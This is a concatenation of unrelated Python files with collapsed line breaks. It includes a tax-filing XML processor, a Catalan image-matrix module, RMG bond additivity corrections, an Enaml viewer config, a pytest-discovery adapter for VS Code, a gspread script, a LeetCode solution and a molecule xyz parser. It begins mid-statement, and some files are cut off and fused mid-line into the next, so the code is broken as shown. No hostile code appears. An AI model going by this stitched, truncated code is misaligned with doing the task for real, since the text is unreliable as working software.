= None # Erase this to prevent memory leaks if not self.xml_runner: # will start up faster if we don't have to reread/import csvs self.xml_runner = XMLRunner(standardizer=self.standardizer) whole_submission = XMLSubmission.objects.get( object_id=submission['object_id'] ) if type(whole_submission.as_json)==unicodeType: submission_json = json.loads(whole_submission.as_json) else: # Assume it's a dict? # We don't have any "working" installations that return json as json submission_json=whole_submission.as_json filingobj = Filing(submission['object_id'], json=submission_json) parsedFiling = self.xml_runner.run_from_filing_obj( filingobj, verbose=False, ) result = parsedFiling.get_result() keyerrors = parsedFiling.get_keyerrors() has_keyerrors = len(keyerrors) > 0 try: ProcessedFiling.objects.get(object_id=submission['object_id']) except ProcessedFiling.DoesNotExist: ProcessedFiling.objects.create( ein = whole_submission.ein, object_id = whole_submission.object_id, processed_json = result, keyerrors = keyerrors, has_keyerrors = has_keyerrors, submission = whole_submission ) img.py # -*- encoding: utf-8 -*- def null(): """ retorna una imatge nula >>> null() ('NULL', None) """ return ('NULL', None) def is_null(i): """ retorna true si i es una imatge nula >>> is_null(('NULL', None)) True """ if i!=null(): return False else: return True def white_rgb(w,h): """ Retorna una imatge en format RGB >>> white_rgb(2,2) ('RGB', [[(255, 255, 255), (255, 255, 255)], [(255, 255, 255), (255, 255, 255)]]) >>> white_rgb(1,1) ('RGB', [[(255, 255, 255)]]) """ i=0 l=[] while i<(h): j=0 l_2=[] while j<(w): l_2+=[(255,255,255)] j+=1 l+=[l_2] i+=1 return ('RGB',l) def white_grey(w,h): """ retorna una imatge en blanc en escala de grisos >>> white_grey(2,2) ('L', [[255, 255], [255, 255]]) >>> white_grey(1,1) ('L', [[255]]) """ i=0 l=[] while i<(h): j=0 l_2=[] while j<(w): l_2+=[(255)] j+=1 l+=[l_2] i+=1 return ('L',l) def white_bw(w,h): """ retorna una imatge en blanc en el format blanc i negre >>> white_bw(3,3) ('1', [[255, 255, 255], [255, 255, 255], [255, 255, 255]]) >>> white_bw(1,1) ('1', [[255]]) """ i=0 l=[] while i<(h): j=0 l_2=[] while j<(w): l_2+=[(255)] j+=1 l+=[l_2] i+=1 return ('1',l) def format1(i): """ Donada una imatge en retorna el format >>> format1(('RGB',[(234,9,8),(234,235,123),(255,123,2)])) 'RGB' >>> format1(('L', [[234, 123, 123]])) 'L' """ return i[0] def matrix(i): """ Donada una imatge img retorna la matriu de pixels corresponent >>> matrix(('1',[255,0,255])) [255, 0, 255] """ return i[1] def img(matrix,model='DISCOVER'): """ Donada una matriu de pixels, detecta si es tracta de una imatge de rgb, escala de grisos o blanc i negre i creara una imatge nova. >>> img([(255,0,0),(255,255,255),(255,0,255)], model='DISCOVER') ('1', [(255, 0, 0), (255, 255, 255), (255, 0, 255)]) >>> img([(233, 0 ,0)], model='DISCOVER') ('L', [(233, 0, 0)]) """ t=() tipo="" if model=='DISCOVER': for element in matrix: for pixel in element: if type(pixel)==type(t): return('RGB',matrix) elif pixel>=1 and pixel<=254: return ('L',matrix) else: tipo='1' return (tipo,matrix) else: return (model, matrix) def get_w(i): """ Retorna la amplada de la imatge >>> get_w(('1',[[255,0],[0,255]])) 2 >>> get_w(('RGB',[[(255,234,234)]])) 1 """ a=matrix(i) return len(a[0]) def get_h(i): """ Retorna la alçada de la imatge >>> get_h(('1',[[255,0],[255,0],[255,0]])) 3 >>> get_h(('L',[[255,0],[255,0]])) 2 """ return len(matrix(i)) def subimg(i,ow,oh,w,h): """ retorna una sub-imatge img que té l'origen a les coordenades (ow,oh) i té mides w i h >>> subimg(('1',[[255,255,0],[0,0,255],[0,0,255]]),0,0,1,1) ('1', [[255]]) >>> subimg(('RGB', [[(234, 123, 123)]]), 0,0,1,1) ('RGB', [[(234, 123, 123)]]) """ matriu=matrix(i) subimg=[] f=0 for fila in matriu: c=0 f_n=[] for columna in fila: if f>=oh and f=ow and c=oh and fkblondal/RMG-Py #!/usr/bin/env python3 ############################################################################### # # # RMG - Reaction Mechanism Generator # # # # Copyright (c) 2002-2019 Prof. (), # # Prof. () and the RMG Team () # # # # Permission is hereby granted, free of charge, to any person obtaining a # # copy of this software and associated documentation files (the 'Software'), # # to deal in the Software without restriction, including without limitation # # the rights to use, copy, modify, merge, publish, distribute, sublicense, # # and/or sell copies of the Software, and to permit persons to whom the # # Software is furnished to do so, subject to the following conditions: # # # # The above copyright notice and this permission notice shall be included in # # all copies or substantial portions of the Software. # # # # THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # # DEALINGS IN THE SOFTWARE. # # # ############################################################################### """ This module provides methods for applying Melius-type bond additivity corrections (M-BAC) as described in: Anantharaman and Melius, J. Phys. Chem. A 2005, 109, 1734-1747 """ import numpy as np import pybel from rmgpy.molecule import Molecule, Atom, Bond, get_element import arkane.encorr.data as data from arkane.exceptions import BondAdditivityCorrectionError ################################################################################ atom_spins = { 'H': 0.5, 'C': 1.0, 'N': 1.5, 'O': 1.0, 'F': 0.5, 'Si': 1.0, 'P': 1.5, 'S': 1.0, 'Cl': 0.5, 'Br': 0.5, 'I': 0.5 } def get_bac(model_chemistry, coords, nums, multiplicity=1, mol_corr=0.0): """ Given the model chemistry, molecular coordinates, atomic numbers, and dictionaries of BAC parameters, return the total BAC (should be SUBTRACTED from energy). Note that a molecular correction term other than 0 destroys the size consistency of the quantum chemistry method. This correction also requires the multiplicity of the molecule. """ alpha = 3.0 # Angstrom^-1 # Get BAC parameters try: params = data.mbac[model_chemistry] except KeyError: raise BondAdditivityCorrectionError( 'Missing Melius-type BAC parameters for model chemistry {}'.format(model_chemistry) ) atom_corr = params['atom_corr'] bond_corr_length = params['bond_corr_length'] bond_corr_neighbor = params['bond_corr_neighbor'] # Get single-bonded RMG molecule mol = geo_to_mol(coords, nums) # Molecular correction spin = 0.5 * (multiplicity - 1) bac_mol = mol_corr * (spin - sum(atom_spins[atom.element.symbol] for atom in mol.atoms)) # Atomic correction bac_atom = sum(atom_corr[atom.element.symbol] for atom in mol.atoms) # Bond correction bac_bond = 0.0 for bond in mol.get_all_edges(): atom1 = bond.atom1 atom2 = bond.atom2 symbol1 = atom1.element.symbol symbol2 = atom2.element.symbol # Bond length correction length_corr = (bond_corr_length[symbol1] * bond_corr_length[symbol2]) ** 0.5 length = np.linalg.norm(atom1.coords - atom2.coords) bac_bond += length_corr * np.exp(-alpha * length) # Neighbor correction for other_atom, other_bond in mol.get_bonds(atom1).items(): # Atoms adjacent to atom1 if other_bond is not bond: other_symbol = other_atom.element.symbol bac_bond += bond_corr_neighbor[symbol1] + bond_corr_neighbor[other_symbol] for other_atom, other_bond in mol.get_bonds(atom2).items(): # Atoms adjacent to atom2 if other_bond is not bond: other_symbol = other_atom.element.symbol bac_bond += bond_corr_neighbor[symbol2] + bond_corr_neighbor[other_symbol] return (bac_mol + bac_atom + bac_bond) * 4184.0 # Convert kcal/mol to J/mol def geo_to_mol(coords, nums): """ Convert molecular geometry specified by atomic coordinates and atomic numbers to RMG molecule. Use Open Babel for most cases because it's better at recognizing long bonds. Use RMG for hydrogen because Open Babel can't do it for mysterious reasons. """ if list(nums) == [1, 1]: mol = Molecule() mol.from_xyz(nums, coords) else: xyz = '{}\n\n'.format(len(nums)) xyz += '\n'.join('{0} {1[0]: .10f} {1[1]: .10f} {1[2]: .10f}'.format(n, c) for n, c in zip(nums, coords)) mol = pybel.readstring('xyz', xyz) mol = pybel_to_rmg(mol) return mol def pybel_to_rmg(pybel_mol): """ Convert Pybel molecule to RMG molecule but ignore charge, multiplicity, and bond orders. """ mol = Molecule() for pybel_atom in pybel_mol: element = get_element(pybel_atom.atomicnum) atom = Atom(element=element, coords=np.array(pybel_atom.coords)) mol.vertices.append(atom) for obbond in pybel.ob.OBMolBondIter(pybel_mol.OBMol): begin_idx = obbond.GetBeginAtomIdx() - 1 # Open Babel indexes atoms starting at 1 end_idx = obbond.GetEndAtomIdx() - 1 bond = Bond(mol.vertices[begin_idx], mol.vertices[end_idx]) mol.add_bond(bond) return mol 10-100 #------------------------------------------------------------------------------ # Copyright (c) 2012, Enthought, Inc. # All rights reserved. #------------------------------------------------------------------------------ from traits.api import ( HasTraits, Bool, Range, Enum, on_trait_change, Property, Str, List, Int, cached_property, Instance ) from enaml.styling.color import Color # An enum defining a image extension. ImageFileExt = Enum( 'bmp', 'png', 'jpg', 'jpeg', 'gif', 'pbm', 'pgm', 'ppm', 'tiff', 'xbm', 'xpm', ) class ViewConfig(HasTraits): """ A simple state object to share amongst the various ui widgets. This is not strictly required when developing an Enaml application, but as the view complexity grows, it makes the code more unified and manageable. It's also easier to see the view logic in centralized place. """ #: The types of images for which to search. search_image_exts = List(ImageFileExt, value=['png', 'jpg', 'jpeg']) #: The regex pattern to use when searching for images. image_file_pattern = Property(Str, depends_on='search_image_exts') #: The directory currently being searched. search_dir = Str('.') #: The minimum allowed thumbnail size. min_thumb_size = Int(16) #: The maximum allowed thumbnail size. max_thumb_size = Int(256) #: The size of the thumbnails in the ui. thumb_size = Range('min_thumb_size', 'max_thumb_size', value=150) #: Select which browsing widget should be visible visible_browser_widget = Enum('textual', 'thumbnails') #: The layout mode to use for the thumbnails view. thumb_layout = Enum('vertical', 'horizontal', 'grid') #: The location of the dock pane dock_area = Enum('left', 'right', 'top', 'bottom', value='left') #: Whether or not the dock pane is floating floating_dock = Bool(False) #: Whether or not to recrusively load the thumbnails recursive_load = Bool(True) #: The background color of the image viewing widget. viewer_bgcolor = Instance(Color, (146, 146, 146)) #: The background color of the browser widgets. browser_bgcolor = Instance(Color, (235, 239, 246)) @cached_property def _get_image_file_pattern(self): """ Creates a search regex for the requested image types. """ return r'.*?\.(%s)$' % '|'.join(self.search_image_exts) @on_trait_change('dock_area, floating_dock') def _update_thumb_layout(self): """ Updates the thumbnail layout mode based on the position of the dock pane. """ if self.floating_dock: self.thumb_layout = 'grid' elif self.dock_area in ('left', 'right'): self.thumb_layout = 'vertical' else: self.thumb_layout = 'horizontal' PUPPETDB_HOST = 'localhost' PUPPETDB_PORT = 8080 PUPPETDB_SSL_VERIFY = True PUPPETDB_KEY = None PUPPETDB_CERT = None PUPPETDB_TIMEOUT = 20 DEV_LISTEN_HOST = '127.0.0.1' DEV_LISTEN_PORT = 5000 UNRESPONSIVE_HOURS = 2 ENABLE_QUERY = True LOCALISE_TIMESTAMP = True LOGLEVEL = 'info' REPORTS_COUNT = 10 OFFLINE_MODE = False from .setup.LinkedList import LinkedList as LinkedList # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. """ During "collection", pytest finds all the tests it supports. These are called "items". The process is top-down, mostly tracing down through the file system. Aside from its own machinery, pytest supports hooks that find tests. Effectively, pytest starts with a set of "collectors"; objects that can provide a list of tests and sub-collectors. All collectors in the resulting tree are visited and the tests aggregated. For the most part, each test's (and collector's) parent is identified as the collector that collected it. Collectors and items are collectively identified as "nodes". The pytest API relies on collector and item objects providing specific methods and attributes. In addition to corresponding base classes, pytest provides a number of concrete impementations. The following are the known pytest node types: Node Collector FSCollector Session (the top-level collector) File Module Package DoctestTextfile DoctestModule PyCollector (Module) (...) Class UnitTestCase Instance Item Function TestCaseFunction DoctestItem Here are the unique attrs for those classes: Node name nodeid (readonly) config session (parent) - the parent node (fspath) - the file from which the node was collected ---- own_marksers - explicit markers (e.g. with @pytest.mark()) keywords extra_keyword_matches Item location - where the actual test source code is: (relfspath, lno, fullname) user_properties PyCollector module class instance obj Function module class instance obj function (callspec) (fixturenames) funcargs originalname - w/o decorations, e.g. [...] for parameterized DoctestItem dtest obj When parsing an item, we make use of the following attributes: * name * nodeid * __class__ + __name__ * fspath * location * function + __name__ + __code__ + __closure__ * own_markers """ from __future__ import absolute_import, print_function import sys import pytest import _pytest.doctest import _pytest.unittest from ..info import TestInfo, TestPath def should_never_reach_here(node, *extra): """Indicates a code path we should never reach.""" print('The Python extension has run into an unexpected situation') print('while processing a pytest node during test discovery. Please') print('Please open an issue at:') print(' https://github.com/microsoft/vscode-python/issues') print('and paste the following output there.') print() for field, info in _summarize_item(node): print('{}: {}'.format(field, info)) if extra: print() print('extra info:') for info in extra: if isinstance(line, str): print(str) else: try: print(*line) except TypeError: print(line) print() print('traceback:') import traceback traceback.print_stack() msg = 'Unexpected pytest node (see printed output).' exc = NotImplementedError(msg) exc.node = node return exc def parse_item(item, _normcase, _pathsep): """Return (TestInfo, [suite ID]) for the given item. The suite IDs, if any, are in parent order with the item's direct parent at the beginning. The parent of the last suite ID (or of the test if there are no suites) is the file ID, which corresponds to TestInfo.path. """ #_debug_item(item, showsummary=True) kind, _ = _get_item_kind(item) (nodeid, parents, fileid, testfunc, parameterized ) = _parse_node_id(item.nodeid, kind, _pathsep, _normcase) # Note: testfunc does not necessarily match item.function.__name__. # This can result from importing a test function from another module. # Figure out the file. relfile = fileid fspath = _normcase(str(item.fspath)) if not fspath.endswith(relfile[1:]): raise should_never_reach_here( item, fspath, relfile, ) testroot = fspath[:-len(relfile) + 1] location, fullname = _get_location(item, relfile, _normcase, _pathsep) if kind == 'function': if testfunc and fullname != testfunc + parameterized: raise should_never_reach_here( item, fullname, testfunc, parameterized, ) elif kind == 'doctest': if (testfunc and fullname != testfunc and fullname != '[doctest] ' + testfunc): raise should_never_reach_here( item, fullname, testfunc, ) testfunc = None # Sort out the parent. if parents: parentid, _, _ = parents[0] else: parentid = None # Sort out markers. # See: https://docs.pytest.org/en/latest/reference.html#marks markers = set() for marker in item.own_markers: if marker.name == 'parameterize': # We've already covered these. continue elif marker.name == 'skip': markers.add('skip') elif marker.name == 'skipif': markers.add('skip-if') elif marker.name == 'xfail': markers.add('expected-failure') # We can add support for other markers as we need them? test = TestInfo( id=nodeid, name=item.name, path=TestPath( root=testroot, relfile=relfile, func=testfunc, sub=[parameterized] if parameterized else None, ), source=location, markers=sorted(markers) if markers else None, parentid=parentid, ) if parents and parents[-1] == ('.', None, 'folder'): # This should always be true? parents[-1] = ('.', testroot, 'folder') return test, parents def _get_location(item, relfile, _normcase, _pathsep): """Return (loc str, fullname) for the given item.""" srcfile, lineno, fullname = item.location srcfile = _normcase(srcfile) if srcfile in (relfile, relfile[len(_pathsep) + 1:]): srcfile = relfile else: # pytest supports discovery of tests imported from other # modules. This is reflected by a different filename # in item.location. srcfile, lineno = _find_location( srcfile, lineno, relfile, item.function, _pathsep) if not srcfile.startswith('.' + _pathsep): srcfile = '.' + _pathsep + srcfile # from pytest, line numbers are 0-based location = '{}:{}'.format(srcfile, int(lineno) + 1) return location, fullname def _find_location(srcfile, lineno, relfile, func, _pathsep): """Return (filename, lno) for the given location info.""" if sys.version_info > (3,): return srcfile, lineno if (_pathsep + 'unittest' + _pathsep + 'case.py') not in srcfile: return srcfile, lineno # Unwrap the decorator (e.g. unittest.skip). srcfile = relfile lineno = -1 try: func = func.__closure__[0].cell_contents except (IndexError, AttributeError): return srcfile, lineno else: if callable(func) and func.__code__.co_filename.endswith(relfile[1:]): lineno = func.__code__.co_firstlineno - 1 return srcfile, lineno def _parse_node_id(testid, kind, _pathsep, _normcase): """Return the components of the given node ID, in heirarchical order.""" nodes = iter(_iter_nodes(testid, kind, _pathsep, _normcase)) testid, name, kind = next(nodes) parents = [] parameterized = None if kind == 'doctest': parents = list(nodes) fileid, _, _ = parents[0] return testid, parents, fileid, name, parameterized elif kind is None: fullname = None else: if kind == 'subtest': node = next(nodes) parents.append(node) funcid, funcname, _ = node parameterized = testid[len(funcid):] elif kind == 'function': funcname = name else: raise should_never_reach_here( testid, kind, ) fullname = funcname for node in nodes: parents.append(node) parentid, name, kind = node if kind == 'file': fileid = parentid break elif fullname is None: # We don't guess how to interpret the node ID for these tests. continue elif kind == 'suite': fullname = name + '.' + fullname else: raise should_never_reach_here( testid, node, ) else: fileid = None parents.extend(nodes) # Add the rest in as-is. return testid, parents, fileid, fullname, parameterized or '' def _iter_nodes(nodeid, kind, _pathsep, _normcase): """Yield (nodeid, name, kind) for the given node ID and its parents.""" nodeid = _normalize_node_id(nodeid, kind, _pathsep, _normcase) if kind == 'function' and nodeid.endswith(']'): funcid, sep, parameterized = nodeid.partition('[') if not sep: raise should_never_reach_here( nodeid, ) yield (nodeid, sep + parameterized, 'subtest') nodeid = funcid parentid, _, name = nodeid.rpartition('::') if not parentid: if kind is None: # This assumes that plugins can generate nodes that do not # have a parent. All the builtin nodes have one. yield (nodeid, name, kind) return # We expect at least a filename and a name. raise should_never_reach_here( nodeid, ) yield (nodeid, name, kind) # Extract the suites. while '::' in parentid: suiteid = parentid parentid, _, name = parentid.rpartition('::') yield (suiteid, name, 'suite') # Extract the file and folders. fileid = parentid parentid, _, filename = fileid.rpartition(_pathsep) yield (fileid, filename, 'file') # We're guaranteed at least one (the test root). while _pathsep in parentid: folderid = parentid parentid, _, foldername = folderid.rpartition(_pathsep) yield (folderid, foldername, 'folder') # We set the actual test root later at the bottom of parse_item(). testroot = None yield (parentid, testroot, 'folder') def _normalize_node_id(nodeid, kind, _pathsep, _normcase): """Return the canonical form for the given node ID.""" while '::()::' in nodeid: nodeid = nodeid.replace('::()::', '::') if kind is None: return nodeid fileid, sep, remainder = nodeid.partition('::') if sep: # pytest works fine even if we normalize the filename. nodeid = _normcase(fileid) + sep + remainder if nodeid.startswith(_pathsep): raise should_never_reach_here( nodeid, ) if not nodeid.startswith('.' + _pathsep): nodeid = '.' + _pathsep + nodeid return nodeid def _get_item_kind(item): """Return (kind, isunittest) for the given item.""" if isinstance(item, _pytest.doctest.DoctestItem): return 'doctest', False elif isinstance(item, _pytest.unittest.TestCaseFunction): return 'function', True elif isinstance(item, pytest.Function): # We *could* be more specific, e.g. "method", "subtest". return 'function', False else: return None, False ############################# # useful for debugging _FIELDS = [ 'nodeid', 'kind', 'class', 'name', 'fspath', 'location', 'function', 'markers', 'user_properties', 'attrnames', ] def _summarize_item(item): if not hasattr(item, 'nodeid'): yield 'nodeid', item return for field in _FIELDS: try: if field == 'kind': yield field,_get_item_kind(item) elif field == 'class': yield field, item.__class__.__name__ elif field == 'markers': yield field, item.own_markers #yield field, list(item.iter_markers()) elif field == 'attrnames': yield field, dir(item) else: yield field, getattr(item, field, '') except Exception as exc: yield field, '' def _debug_item(item, showsummary=False): item._debugging = True try: summary = dict(_summarize_item(item)) finally: item._debugging = False if showsummary: print(item.nodeid) for key in ('kind', 'class', 'name', 'fspath', 'location', 'func', 'markers', 'props'): print(' {:12} {}'.format(key, summary[key])) print() return summary exclude.py #!/usr/local/bin/python3.7 """ Module to exclude 'bad' experimental runs. Mostly repeated runs where the previous set of data used a bad tip size. """ import os def exclusions(): f = "excludes.txt" e = [] if os.path.exists(f): e = [ int(l.strip()) for l in open(f).readlines()] return e0 """Error definitions.""" class BitvavoException(Exception): """Raised when API error occurs.""" def __init__(self, status_code, message): self.status_code = status_code self.message = message def __str__(self): # pragma: no cover return "Error(code=%s): %s" % (self.status_code, self.message) import torch.utils.data class LimitLength(torch.utils.data.Dataset): def __init__(self, dataset: torch.utils.data.Dataset, max_length: int, get_length=lambda x: x["in_len"]) -> None: super().__init__() self.dataset = dataset self.indices = [i for i in range(len(dataset)) if get_length(dataset[i]) <= max_length] def __len__(self) -> int: return len(self.indices) def __getitem__(self, index): return self.dataset[self.indices[index]] def __getattr__(self, item): return getattr(self.dataset, item) import os import unittest import matplotlib import numpy as np import tensorflow as tf from fastestimator.test.unittest_util import check_img_similar, fig_to_rgb_array, img_to_rgb_array from fastestimator.util import ImgData class TestImageData(unittest.TestCase): @classmethod def setUpClass(cls): cls.output_img = os.path.abspath(os.path.join(__file__, "..", "resources", "test_img_data_paintfig.png")) cls.input_image_shape = (150, 150) cls.label_shape = (4, ) cls.x_test = 0.5 * tf.ones((4, 150, 150, 3)) cls.y_test = tf.ones(cls.label_shape) cls.img_data = ImgData(y=cls.y_test, x=cls.x_test) def setUp(self) -> None: self.old_backend = matplotlib.get_backend() matplotlib.use("Agg") def tearDown(self) -> None: matplotlib.use(self.old_backend) def test_n_cols(self): self.assertEqual(self.img_data._n_cols(), 2) def test_n_rows(self): self.assertEqual(self.img_data._n_rows(), 1) def test_shape_to_width_1d(self): self.assertEqual(self.img_data._shape_to_width(self.label_shape, min_width=300), 300, 'Output should be equal to minimum width') def test_shape_to_width_2d(self): self.assertEqual(self.img_data._shape_to_width(self.input_image_shape, min_width=100), 150, 'Output should be equal to input width') def test_shape_to_height_1d(self): self.assertEqual(self.img_data._shape_to_height(self.label_shape, min_height=300), 300, 'Output should be equal to minimum height') def test_shape_to_height_2d(self): self.assertEqual(self.img_data._shape_to_height(self.input_image_shape, min_height=150), 150, 'Output should be equal to input height') def test_img_data_widths(self): index = 0 self.assertEqual(self.img_data._widths(index), [(0, 200), (250, 450)]) def test_img_data_total_width(self): self.assertEqual(self.img_data._total_width(), 450) def test_img_data_heights(self): self.assertEqual(self.img_data._heights(), [(10, 810)]) def test_img_data_total_height(self): self.assertEqual(self.img_data._total_height(), 840) def test_img_data_batch_size(self): self.assertEqual(self.img_data._batch_size(0), 4) def test_paint_figure(self): fig = self.img_data.paint_figure() output = img_to_rgb_array(self.output_img) output_test = fig_to_rgb_array(fig) self.assertTrue(check_img_similar(output, output_test)) def test_paint_numpy(self): output_test = self.img_data.paint_numpy() output_test = np.squeeze(output_test, axis=0) output = img_to_rgb_array(self.output_img) self.assertTrue(check_img_similar(output, output_test)) 1-10 # import libraries import gspread from oauth2client.service_account import ServiceAccountCredentials # assign a scope scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive'] # create credentials credaccess = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope) # authorize a gspread client client = gspread.authorize(credaccess) # access Google Sheets by calling client.open sheet = client.open('My Spreadsheet').sheet1 # set data to all records in sheet 1 data = sheet.get_all_records() # print to terminal print(data) Problems/Study Plans/Data Structure/Data Structure II/65_minimum_remove_to_make_valid_parentheses.py # https://leetcode.com/problems/minimum-remove-to-make-valid-parentheses/ class Solution: def minRemoveToMakeValid(self, s: str) -> str: indexes_to_remove = set() unclosed_open_parentheses_indexes = list() for idx, char in enumerate(s): if char == '(': unclosed_open_parentheses_indexes.append(idx) elif char == ')': if unclosed_open_parentheses_indexes: unclosed_open_parentheses_indexes.pop() else: indexes_to_remove.add(idx) indexes_to_remove.update(unclosed_open_parentheses_indexes) result = list() for idx, char in enumerate(s): if idx not in indexes_to_remove: result.append(char) return ''.join(result) #! /usr/bin/env python from momo import sys, np, osio, endl, flush from __qmshell__ import e_xyz_from_xyz from __molecules__ import Atom, Molecule osio.Connect() osio.AddArg('file', typ=str, default=None, help='Input xyz-file') osio.AddArg('molname', typ=str, default='UNSCRAMBLED', help='Molecule name') osio.AddArg('gro', typ=str, default='', help='Output gro-file') osio.AddArg('xyz', typ=str, default='', help='Output xyz-file') osio.AddArg('ring_exclude', typ=(list, str), default=['Al','Zn'], help='Exclude these atoms from ring structure') opts, xopts = osio.Parse() xyzfile = opts.file molname = opts.molname outfile_xyz = opts.xyz outfile_gro = opts.gro exclude_bonds_to = opts.ring_exclude wordy = False leaky = False # COVALENCE RADII (from Cambridge Structural Database, table see http://en.wikipedia.org/wiki/Covalent_radius) COVRAD_TABLE = {} COVRAD_TABLE['H'] = 0.31 COVRAD_TABLE['C'] = 0.76 COVRAD_TABLE['N'] = 0.71 COVRAD_TABLE['O'] = 0.66 COVRAD_TABLE['Se'] = 1.20 COVRAD_TABLE['S'] = 1.05 COVRAD_TABLE['Zn'] = 1.22 # FORCEFIELD TYPE TABLE TYPE_TABLE = {\ 'C:CCH' : 'CA', # Aromatic 'C:CCN' : 'CA', # Aromatic + Nitrogen (TODO) 'C:CHS' : 'CA', # 'C:CCSe' : 'CB', # Aromatic + Selenium (TODO) 'C:CCS' : 'CB', # Aromatic + Sulphur 'C:CCO' : 'CO', # Aromatic + Carboxylic 'C:CNSe' : 'CS', # Aromatic + Selenium + Nitrogen (TODO) 'C:CCHH' : 'CR', # Aliphatic 'C:CHHN' : 'CR', # Aliphatic 'C:CHHH' : 'CR', # Methyl 'C:CCC' : 'CC', # 'C:CN' : 'CN', # Cyano-group (TODO) 'H:C' : 'HC', # 'N:CCC' : 'NA', # Aromatic 'N:C' : 'NC', # 'O:C' : 'OC', # Carboxylic group 'S:CC' : 'S', # Thiophene sulphur 'Se:CC' : 'Se'} # ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' NUMBERS = '1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' class AtomXyz(object): def __init__(self, e, xyz, id): # PROPERTIES self.e = e self.id = id self.xyz = xyz self.x = xyz[0] self.y = xyz[1] self.z = xyz[2] self.covrad = COVRAD_TABLE[self.e] if self.e in exclude_bonds_to: self.covrad = 0.0 # FRAGMENT INFO self.name = '' self.type = '' self.fragname = '___' self.fragid = 0 # BONDING LEVEL (-1 = CORE) self.level = -1 # ALL BONDS self.bonded = [] self.bonded_short = [] # CORE BONDS self.bonded_core = [] self.bonds_core = [] # NON-RING CORE BONDS self.bonded_non_ring = [] self.bonds_non_ring = [] # DOCKED self.docked_to = [] self.dock_for = [] # PATHS OF SOME LENGTH self.path_length = -1 self.paths = [] # NON-RING PATHS OF SOME LENGTH self.path_length_non_ring = -1 self.paths_non_ring = [] def generate_type(self): type_key = '' bonded_elems = [] for b in self.bonded: bonded_elems.append(b.e) bonded_elems.sort() for e in bonded_elems: type_key += e type_key = self.e + ':' + type_key try: self.type = TYPE_TABLE[type_key] except KeyError: default_type = self.e+'X' print "Type definition missing for '%s', defaulting to '%s'" % (type_key, default_type) self.type = default_type return def get_all_docked_atoms(self): docked_atoms = [] docked_atoms = docked_atoms + self.dock_for for d in self.dock_for: docked_atoms = docked_atoms + d.get_all_docked_atoms() return docked_atoms def add_bond_core(self, bonded_atom, bond): self.bonded_core.append(bonded_atom) self.bonds_core.append(bond) return def add_bond_non_ring(self, bonded_atom, bond): self.bonded_non_ring.append(bonded_atom) self.bonds_non_ring.append(bond) return def find_paths(self, length, exclusion_list=[], start_here=True): if length == 0: return [] paths = [] #exclusion_list.append(self) for bond in self.bonds_core: new_path = Path(start_with_atom=self if start_here else None) if not bond.b in exclusion_list: new_path.extend(bond) paths.append(new_path) other = bond.b #other_paths = other.find_paths(length=length-1, exclusion_list=exclusion_list, start_here=False) other_paths = other.find_paths(length=length-1, exclusion_list=[self], start_here=False) for o in other_paths: joined = JoinPaths(new_path, o) paths.append(joined) if start_here: self.path_length = length self.paths = paths return paths def find_paths_non_ring(self, length=4, exclusion_list=[], start_here=True): if length == 0: return [] paths = [] #exclusion_list.append(self) for bond in self.bonds_non_ring: new_path = Path(start_with_atom=self if start_here else None) if not bond.b in exclusion_list: new_path.extend(bond) paths.append(new_path) other = bond.b #other_paths = other.find_paths(length=length-1, exclusion_list=exclusion_list, start_here=False) other_paths = other.find_paths_non_ring(length=length-1, exclusion_list=[self], start_here=False) for o in other_paths: joined = JoinPaths(new_path, o) paths.append(joined) if start_here: self.path_length_non_ring = length self.paths_non_ring = paths return paths class Path(object): def __init__(self, start_with_atom=None): self.visited = [] if start_with_atom != None: self.visited.append(start_with_atom) self.bonds = [] def add_visited(self, v): self.visited.append(v) def add_bond(self, b): self.bonds.append(b) def extend(self, bond): self.add_visited(bond.b) self.add_bond(bond) def print_info(self): for v in self.visited: print "[%d:%s]" % (v.id,v.e), print "" def get_first(self): return self.visited[0] def get_last(self): return self.visited[-1] class BondXyz(object): def __init__(self, atom1, atom2): self.a = atom1 self.b = atom2 def JoinPaths(path1, path2): joined_path = Path() joined_path.visited = path1.visited + path2.visited joined_path.bonds = path1.bonds + path2.bonds return joined_path class Ring(object): def __init__(self, first_pair=None): self.atoms = [] self.bonded_structures = [] if first_pair != None: self.atoms.append(pair[0]) self.atoms.append(pair[1]) def type(self): return "ring" def has_atom(self, atom): return self.check_atom(atom) def check_atom(self, atom): if atom in self.atoms: return True else: return False def check_add_pair(self, pair): has_a = self.check_atom(pair[0]) has_b = self.check_atom(pair[1]) if has_a and not has_b: self.atoms.append(pair[1]) return True elif has_b and not has_a: self.atoms.append(pair[0]) return True elif has_b and has_a: return True else: return False def print_info(self): for a in self.atoms: print "%2d" % a.id, print "" def intersects(self, other): intersects = False for a in self.atoms: if a in other.atoms: intersects = True break return intersects def add(self, other): for atom in other.atoms: if not atom in self.atoms: self.atoms.append(atom) return def find_round_trip_path(self, visited=[], start_atm=None): started_here = False if start_atm == None: self.atoms = sorted(self.atoms, key=lambda atm: len(atm.bonded)) start_atm = self.atoms[0] visited.append(start_atm) started_here = True for bond in start_atm.bonds_core: # Backup visited list to be able to revert to this point visited_0 = [] for v in visited: visited_0.append(v) if bond.b in visited or not bond.b in self.atoms: continue # Partner atom not yet visited, proceed visited.append(bond.b) visited = self.find_round_trip_path(visited, bond.b) # All atoms visited = round path? if len(visited) == len(self.atoms): break # A dead end. Revert & try next bond else: visited = [] for v in visited_0: visited.append(v) #assert len(visited) <= len(self.atoms) if started_here: if len(visited) != len(self.atoms): osio << osio.mr << "WARNING Failed to generate round-trip path (atom order will be compromised)" << endl visited = self.atoms else: if wordy: osio << "Found round-trip path" << endl return visited def order_atoms(self): self.atoms = self.find_round_trip_path(visited=[], start_atm=None) return def get_all_bonded_structures(self, exclude_list=[]): bonded = [] 